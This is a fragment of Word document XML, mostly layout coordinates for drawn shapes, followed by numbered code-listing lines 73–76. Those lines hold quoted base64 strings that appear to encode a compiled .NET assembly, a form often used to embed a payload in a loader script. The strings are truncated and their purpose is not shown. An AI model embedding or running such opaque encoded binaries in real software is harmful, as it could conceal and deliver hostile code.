        <v:shape style="position:absolute;left:2110;top:14250;width:110;height:230" coordorigin="2110,14250" coordsize="110,230" path="m2128,14265l2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2130,14265,2130,14265,2130,14265,2130,14265,2131,14265,2131,14265,2131,14265,2131,14265,2132,14265,2132,14265,2132,14265,2133,14265,2133,14265,2133,14265,2134,14265,2134,14265,2134,14265,2135,14265,2135,14265,2136,14265,2136,14265,2137,14265,2137,14265,2138,14265,2138,14265,2139,14265,2140,14265,2140,14265,2141,14265,2142,14265,2142,14265,2143,14265,2144,14265,2145,14265,2145,14265,2146,14265,2147,14265,2148,14265,2149,14265,2150,14265,2151,14265,2152,14265,2153,14265,2154,14265,2155,14265,2156,14265,2157,14265,2158,14265,2159,14265,2160,14265,2162,14265,2163,14265,2164,14265,2165,14265,2167,14265,2168,14265,2170,14265,2171,14265,2173,14265,2174,14265,2176,14265,2177,14265,2179,14265,2180,14265,2182,14265,2184,14265,2186,14265,2187,14265,2189,14265,2191,14265,2193,14265,2195,14265,2197,14265,2199,14265,2201,14265,2203,14265,2205,14265,2207,14265,2210,14265,2212,14265,2214,14265,2216,14265,2219,14265,2221,14265,2224,14265,2226,14265,2229,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14267,2231,14267,2231,14267,2231,14267,2231,14268,2231,14268,2231,14268,2231,14269,2231,14269,2231,14269,2231,14270,2231,14270,2231,14271,2231,14271,2231,14272,2231,14272,2231,14273,2231,14273,2231,14274,2231,14275,2231,14275,2231,14276,2231,14277,2231,14278,2231,14279,2231,14280,2231,14280,2231,14281,2231,14282,2231,14283,2231,14285,2231,14286,2231,14287,2231,14288,2231,14289,2231,14291,2231,14292,2231,14293,2231,14295,2231,14296,2231,14298,2231,14299,2231,14301,2231,14303,2231,14304,2231,14306,2231,14308,2231,14310,2231,14312,2231,14314,2231,14316,2231,14318,2231,14320,2231,14322,2231,14325,2231,14327,2231,14330,2231,14332,2231,14335,2231,14337,2231,14340,2231,14343,2231,14345,2231,14348,2231,14351,2231,14354,2231,14357,2231,14360,2231,14364,2231,14367,2231,14370,2231,14374,2231,14377,2231,14381,2231,14384,2231,14388,2231,14392,2231,14396,2231,14400,2231,14404,2231,14408,2231,14412,2231,14417,2231,14421,2231,14425,2231,14430,2231,14434,2231,14439,2231,14444,2231,14449,2231,14454,2231,14459,2231,14464,2231,14469,2231,14475,2231,14480,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2229,14486,2229,14486,2229,14486,2229,14486,2229,14486,2228,14486,2228,14486,2228,14486,2227,14486,2227,14486,2227,14486,2227,14486,2226,14486,2226,14486,2225,14486,2225,14486,2225,14486,2224,14486,2224,14486,2223,14486,2223,14486,2222,14486,2222,14486,2221,14486,2221,14486,2220,14486,2219,14486,2219,14486,2218,14486,2217,14486,2217,14486,2216,14486,2215,14486,2214,14486,2214,14486,2213,14486,2212,14486,2211,14486,2210,14486,2209,14486,2208,14486,2207,14486,2206,14486,2205,14486,2204,14486,2203,14486,2202,14486,2201,14486,2200,14486,2199,14486,2197,14486,2196,14486,2195,14486,2194,14486,2192,14486,2191,14486,2189,14486,2188,14486,2187,14486,2185,14486,2183,14486,2182,14486,2180,14486,2179,14486,2177,14486,2175,14486,2173,14486,2172,14486,2170,14486,2168,14486,2166,14486,2164,14486,2162,14486,2160,14486,2158,14486,2156,14486,2154,14486,2152,14486,2149,14486,2147,14486,2145,14486,2143,14486,2140,14486,2138,14486,2135,14486,2133,14486,2130,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14484,2128,14484,2128,14484,2128,14484,2128,14484,2128,14483,2128,14483,2128,14483,2128,14483,2128,14482,2128,14482,2128,14482,2128,14481,2128,14481,2128,14480,2128,14480,2128,14479,2128,14479,2128,14478,2128,14478,2128,14477,2128,14476,2128,14476,2128,14475,2128,14474,2128,14474,2128,14473,2128,14472,2128,14471,2128,14470,2128,14469,2128,14468,2128,14467,2128,14466,2128,14465,2128,14464,2128,14463,2128,14461,2128,14460,2128,14459,2128,14457,2128,14456,2128,14454,2128,14453,2128,14451,2128,14450,2128,14448,2128,14446,2128,14444,2128,14443,2128,14441,2128,14439,2128,14437,2128,14435,2128,14433,2128,14430,2128,14428,2128,14426,2128,14423,2128,14421,2128,14419,2128,14416,2128,14413,2128,14411,2128,14408,2128,14405,2128,14402,2128,14399,2128,14396,2128,14393,2128,14390,2128,14387,2128,14384,2128,14380,2128,14377,2128,14373,2128,14370,2128,14366,2128,14362,2128,14359,2128,14355,2128,14351,2128,14347,2128,14343,2128,14338,2128,14334,2128,14330,2128,14325,2128,14321,2128,14316,2128,14311,2128,14307,2128,14302,2128,14297,2128,14292,2128,14287,2128,14281,2128,14276,2128,14271,2128,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:712.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14250" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14250;width:110;height:230" coordorigin="2530,14250" coordsize="110,230" path="m2543,14265l2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2545,14265,2545,14265,2545,14265,2545,14265,2545,14265,2546,14265,2546,14265,2546,14265,2547,14265,2547,14265,2547,14265,2548,14265,2548,14265,2548,14265,2549,14265,2549,14265,2549,14265,2550,14265,2550,14265,2551,14265,2551,14265,2552,14265,2552,14265,2553,14265,2553,14265,2554,14265,2555,14265,2555,14265,2556,14265,2557,14265,2557,14265,2558,14265,2559,14265,2560,14265,2560,14265,2561,14265,2562,14265,2563,14265,2564,14265,2565,14265,2566,14265,2567,14265,2568,14265,2569,14265,2570,14265,2571,14265,2572,14265,2573,14265,2574,14265,2575,14265,2577,14265,2578,14265,2579,14265,2580,14265,2582,14265,2583,14265,2585,14265,2586,14265,2587,14265,2589,14265,2591,14265,2592,14265,2594,14265,2595,14265,2597,14265,2599,14265,2601,14265,2602,14265,2604,14265,2606,14265,2608,14265,2610,14265,2612,14265,2614,14265,2616,14265,2618,14265,2620,14265,2622,14265,2625,14265,2627,14265,2629,14265,2631,14265,2634,14265,2636,14265,2639,14265,2641,14265,2644,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14265,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14266,2646,14267,2646,14267,2646,14267,2646,14267,2646,14268,2646,14268,2646,14268,2646,14269,2646,14269,2646,14269,2646,14270,2646,14270,2646,14271,2646,14271,2646,14272,2646,14272,2646,14273,2646,14273,2646,14274,2646,14275,2646,14275,2646,14276,2646,14277,2646,14278,2646,14279,2646,14280,2646,14280,2646,14281,2646,14282,2646,14283,2646,14285,2646,14286,2646,14287,2646,14288,2646,14289,2646,14291,2646,14292,2646,14293,2646,14295,2646,14296,2646,14298,2646,14299,2646,14301,2646,14303,2646,14304,2646,14306,2646,14308,2646,14310,2646,14312,2646,14314,2646,14316,2646,14318,2646,14320,2646,14322,2646,14325,2646,14327,2646,14330,2646,14332,2646,14335,2646,14337,2646,14340,2646,14343,2646,14345,2646,14348,2646,14351,2646,14354,2646,14357,2646,14360,2646,14364,2646,14367,2646,14370,2646,14374,2646,14377,2646,14381,2646,14384,2646,14388,2646,14392,2646,14396,2646,14400,2646,14404,2646,14408,2646,14412,2646,14417,2646,14421,2646,14425,2646,14430,2646,14434,2646,14439,2646,14444,2646,14449,2646,14454,2646,14459,2646,14464,2646,14469,2646,14475,2646,14480,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2646,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2645,14486,2644,14486,2644,14486,2644,14486,2644,14486,2643,14486,2643,14486,2643,14486,2643,14486,2642,14486,2642,14486,2642,14486,2641,14486,2641,14486,2641,14486,2640,14486,2640,14486,2640,14486,2639,14486,2639,14486,2638,14486,2638,14486,2637,14486,2637,14486,2636,14486,2636,14486,2635,14486,2634,14486,2634,14486,2633,14486,2632,14486,2632,14486,2631,14486,2630,14486,2629,14486,2629,14486,2628,14486,2627,14486,2626,14486,2625,14486,2624,14486,2623,14486,2622,14486,2621,14486,2620,14486,2619,14486,2618,14486,2617,14486,2616,14486,2615,14486,2614,14486,2612,14486,2611,14486,2610,14486,2609,14486,2607,14486,2606,14486,2604,14486,2603,14486,2601,14486,2600,14486,2598,14486,2597,14486,2595,14486,2594,14486,2592,14486,2590,14486,2588,14486,2587,14486,2585,14486,2583,14486,2581,14486,2579,14486,2577,14486,2575,14486,2573,14486,2571,14486,2569,14486,2567,14486,2564,14486,2562,14486,2560,14486,2558,14486,2555,14486,2553,14486,2550,14486,2548,14486,2545,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14486,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14485,2543,14484,2543,14484,2543,14484,2543,14484,2543,14484,2543,14483,2543,14483,2543,14483,2543,14483,2543,14482,2543,14482,2543,14482,2543,14481,2543,14481,2543,14480,2543,14480,2543,14479,2543,14479,2543,14478,2543,14478,2543,14477,2543,14476,2543,14476,2543,14475,2543,14474,2543,14474,2543,14473,2543,14472,2543,14471,2543,14470,2543,14469,2543,14468,2543,14467,2543,14466,2543,14465,2543,14464,2543,14463,2543,14461,2543,14460,2543,14459,2543,14457,2543,14456,2543,14454,2543,14453,2543,14451,2543,14450,2543,14448,2543,14446,2543,14444,2543,14443,2543,14441,2543,14439,2543,14437,2543,14435,2543,14433,2543,14430,2543,14428,2543,14426,2543,14423,2543,14421,2543,14419,2543,14416,2543,14413,2543,14411,2543,14408,2543,14405,2543,14402,2543,14399,2543,14396,2543,14393,2543,14390,2543,14387,2543,14384,2543,14380,2543,14377,2543,14373,2543,14370,2543,14366,2543,14362,2543,14359,2543,14355,2543,14351,2543,14347,2543,14343,2543,14338,2543,14334,2543,14330,2543,14325,2543,14321,2543,14316,2543,14311,2543,14307,2543,14302,2543,14297,2543,14292,2543,14287,2543,14281,2543,14276,2543,14271,2543,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:14810;width:110;height:230" coordorigin="2110,14810" coordsize="110,230" path="m2128,14823l2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2128,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2129,14823,2130,14823,2130,14823,2130,14823,2130,14823,2131,14823,2131,14823,2131,14823,2131,14823,2132,14823,2132,14823,2132,14823,2133,14823,2133,14823,2133,14823,2134,14823,2134,14823,2134,14823,2135,14823,2135,14823,2136,14823,2136,14823,2137,14823,2137,14823,2138,14823,2138,14823,2139,14823,2140,14823,2140,14823,2141,14823,2142,14823,2142,14823,2143,14823,2144,14823,2145,14823,2145,14823,2146,14823,2147,14823,2148,14823,2149,14823,2150,14823,2151,14823,2152,14823,2153,14823,2154,14823,2155,14823,2156,14823,2157,14823,2158,14823,2159,14823,2160,14823,2162,14823,2163,14823,2164,14823,2165,14823,2167,14823,2168,14823,2170,14823,2171,14823,2173,14823,2174,14823,2176,14823,2177,14823,2179,14823,2180,14823,2182,14823,2184,14823,2186,14823,2187,14823,2189,14823,2191,14823,2193,14823,2195,14823,2197,14823,2199,14823,2201,14823,2203,14823,2205,14823,2207,14823,2210,14823,2212,14823,2214,14823,2216,14823,2219,14823,2221,14823,2224,14823,2226,14823,2229,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14823,2231,14824,2231,14824,2231,14824,2231,14824,2231,14824,2231,14824,2231,14825,2231,14825,2231,14825,2231,14826,2231,14826,2231,14826,2231,14827,2231,14827,2231,14827,2231,14828,2231,14828,2231,14829,2231,14829,2231,14830,2231,14830,2231,14831,2231,14832,2231,14832,2231,14833,2231,14834,2231,14835,2231,14835,2231,14836,2231,14837,2231,14838,2231,14839,2231,14840,2231,14841,2231,14842,2231,14843,2231,14844,2231,14846,2231,14847,2231,14848,2231,14850,2231,14851,2231,14852,2231,14854,2231,14855,2231,14857,2231,14859,2231,14860,2231,14862,2231,14864,2231,14866,2231,14868,2231,14869,2231,14871,2231,14874,2231,14876,2231,14878,2231,14880,2231,14882,2231,14885,2231,14887,2231,14890,2231,14892,2231,14895,2231,14897,2231,14900,2231,14903,2231,14906,2231,14909,2231,14912,2231,14915,2231,14918,2231,14921,2231,14925,2231,14928,2231,14931,2231,14935,2231,14938,2231,14942,2231,14946,2231,14950,2231,14953,2231,14957,2231,14961,2231,14966,2231,14970,2231,14974,2231,14978,2231,14983,2231,14987,2231,14992,2231,14997,2231,15002,2231,15006,2231,15011,2231,15016,2231,15022,2231,15027,2231,15032,2231,15038,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2231,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2230,15043,2229,15043,2229,15043,2229,15043,2229,15043,2229,15043,2228,15043,2228,15043,2228,15043,2227,15043,2227,15043,2227,15043,2227,15043,2226,15043,2226,15043,2225,15043,2225,15043,2225,15043,2224,15043,2224,15043,2223,15043,2223,15043,2222,15043,2222,15043,2221,15043,2221,15043,2220,15043,2219,15043,2219,15043,2218,15043,2217,15043,2217,15043,2216,15043,2215,15043,2214,15043,2214,15043,2213,15043,2212,15043,2211,15043,2210,15043,2209,15043,2208,15043,2207,15043,2206,15043,2205,15043,2204,15043,2203,15043,2202,15043,2201,15043,2200,15043,2199,15043,2197,15043,2196,15043,2195,15043,2194,15043,2192,15043,2191,15043,2189,15043,2188,15043,2187,15043,2185,15043,2183,15043,2182,15043,2180,15043,2179,15043,2177,15043,2175,15043,2173,15043,2172,15043,2170,15043,2168,15043,2166,15043,2164,15043,2162,15043,2160,15043,2158,15043,2156,15043,2154,15043,2152,15043,2149,15043,2147,15043,2145,15043,2143,15043,2140,15043,2138,15043,2135,15043,2133,15043,2130,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15043,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15042,2128,15041,2128,15041,2128,15041,2128,15041,2128,15040,2128,15040,2128,15040,2128,15039,2128,15039,2128,15038,2128,15038,2128,15037,2128,15037,2128,15036,2128,15036,2128,15035,2128,15035,2128,15034,2128,15033,2128,15033,2128,15032,2128,15031,2128,15030,2128,15030,2128,15029,2128,15028,2128,15027,2128,15026,2128,15025,2128,15024,2128,15023,2128,15021,2128,15020,2128,15019,2128,15018,2128,15016,2128,15015,2128,15013,2128,15012,2128,15010,2128,15009,2128,15007,2128,15006,2128,15004,2128,15002,2128,15000,2128,14998,2128,14996,2128,14994,2128,14992,2128,14990,2128,14988,2128,14986,2128,14983,2128,14981,2128,14979,2128,14976,2128,14974,2128,14971,2128,14968,2128,14966,2128,14963,2128,14960,2128,14957,2128,14954,2128,14951,2128,14948,2128,14945,2128,14941,2128,14938,2128,14934,2128,14931,2128,14927,2128,14924,2128,14920,2128,14916,2128,14912,2128,14908,2128,14904,2128,14900,2128,14896,2128,14892,2128,14887,2128,14883,2128,14878,2128,14874,2128,14869,2128,14864,2128,14859,2128,14854,2128,14849,2128,14844,2128,14839,2128,14834,2128,14828,2128,14823e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14810;width:110;height:230" coordorigin="2530,14810" coordsize="110,230" path="m2543,14823l2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2543,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2544,14823,2545,14823,2545,14823,2545,14823,2545,14823,2545,14823,2546,14823,2546,14823,2546,14823,2547,14823,2547,14823,2547,14823,2548,14823,2548,14823,2548,14823,2549,14823,2549,14823,2549,14823,2550,14823,2550,14823,2551,14823,2551,14823,2552,14823,2552,14823,2553,14823,2553,14823,2554,14823,2555,14823,2555,14823,2556,14823,2557,14823,2557,14823,2558,14823,2559,14823,2560,14823,2560,14823,2561,14823,2562,14823,2563,14823,2564,14823,2565,14823,2566,14823,2567,14823,2568,14823,2569,14823,2570,14823,2571,14823,2572,14823,2573,14823,2574,14823,2575,14823,2577,14823,2578,14823,2579,14823,2580,14823,2582,14823,2583,14823,2585,14823,2586,14823,2587,14823,2589,14823,2591,14823,2592,14823,2594,14823,2595,14823,2597,14823,2599,14823,2601,14823,2602,14823,2604,14823,2606,14823,2608,14823,2610,14823,2612,14823,2614,14823,2616,14823,2618,14823,2620,14823,2622,14823,2625,14823,2627,14823,2629,14823,2631,14823,2634,14823,2636,14823,2639,14823,2641,14823,2644,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14823,2646,14824,2646,14824,2646,14824,2646,14824,2646,14824,2646,14824,2646,14825,2646,14825,2646,14825,2646,14826,2646,14826,2646,14826,2646,14827,2646,14827,2646,14827,2646,14828,2646,14828,2646,14829,2646,14829,2646,14830,2646,14830,2646,14831,2646,14832,2646,14832,2646,14833,2646,14834,2646,14835,2646,14835,2646,14836,2646,14837,2646,14838,2646,14839,2646,14840,2646,14841,2646,14842,2646,14843,2646,14844,2646,14846,2646,14847,2646,14848,2646,14850,2646,14851,2646,14852,2646,14854,2646,14855,2646,14857,2646,14859,2646,14860,2646,14862,2646,14864,2646,14866,2646,14868,2646,14869,2646,14871,2646,14874,2646,14876,2646,14878,2646,14880,2646,14882,2646,14885,2646,14887,2646,14890,2646,14892,2646,14895,2646,14897,2646,14900,2646,14903,2646,14906,2646,14909,2646,14912,2646,14915,2646,14918,2646,14921,2646,14925,2646,14928,2646,14931,2646,14935,2646,14938,2646,14942,2646,14946,2646,14950,2646,14953,2646,14957,2646,14961,2646,14966,2646,14970,2646,14974,2646,14978,2646,14983,2646,14987,2646,14992,2646,14997,2646,15002,2646,15006,2646,15011,2646,15016,2646,15022,2646,15027,2646,15032,2646,15038,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2646,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2645,15043,2644,15043,2644,15043,2644,15043,2644,15043,2643,15043,2643,15043,2643,15043,2643,15043,2642,15043,2642,15043,2642,15043,2641,15043,2641,15043,2641,15043,2640,15043,2640,15043,2640,15043,2639,15043,2639,15043,2638,15043,2638,15043,2637,15043,2637,15043,2636,15043,2636,15043,2635,15043,2634,15043,2634,15043,2633,15043,2632,15043,2632,15043,2631,15043,2630,15043,2629,15043,2629,15043,2628,15043,2627,15043,2626,15043,2625,15043,2624,15043,2623,15043,2622,15043,2621,15043,2620,15043,2619,15043,2618,15043,2617,15043,2616,15043,2615,15043,2614,15043,2612,15043,2611,15043,2610,15043,2609,15043,2607,15043,2606,15043,2604,15043,2603,15043,2601,15043,2600,15043,2598,15043,2597,15043,2595,15043,2594,15043,2592,15043,2590,15043,2588,15043,2587,15043,2585,15043,2583,15043,2581,15043,2579,15043,2577,15043,2575,15043,2573,15043,2571,15043,2569,15043,2567,15043,2564,15043,2562,15043,2560,15043,2558,15043,2555,15043,2553,15043,2550,15043,2548,15043,2545,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15043,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15042,2543,15041,2543,15041,2543,15041,2543,15041,2543,15040,2543,15040,2543,15040,2543,15039,2543,15039,2543,15038,2543,15038,2543,15037,2543,15037,2543,15036,2543,15036,2543,15035,2543,15035,2543,15034,2543,15033,2543,15033,2543,15032,2543,15031,2543,15030,2543,15030,2543,15029,2543,15028,2543,15027,2543,15026,2543,15025,2543,15024,2543,15023,2543,15021,2543,15020,2543,15019,2543,15018,2543,15016,2543,15015,2543,15013,2543,15012,2543,15010,2543,15009,2543,15007,2543,15006,2543,15004,2543,15002,2543,15000,2543,14998,2543,14996,2543,14994,2543,14992,2543,14990,2543,14988,2543,14986,2543,14983,2543,14981,2543,14979,2543,14976,2543,14974,2543,14971,2543,14968,2543,14966,2543,14963,2543,14960,2543,14957,2543,14954,2543,14951,2543,14948,2543,14945,2543,14941,2543,14938,2543,14934,2543,14931,2543,14927,2543,14924,2543,14920,2543,14916,2543,14912,2543,14908,2543,14904,2543,14900,2543,14896,2543,14892,2543,14887,2543,14883,2543,14878,2543,14874,2543,14869,2543,14864,2543,14859,2543,14854,2543,14849,2543,14844,2543,14839,2543,14834,2543,14828,2543,14823e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAi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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gP"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>74</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aj"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>75</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAAN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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wB"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
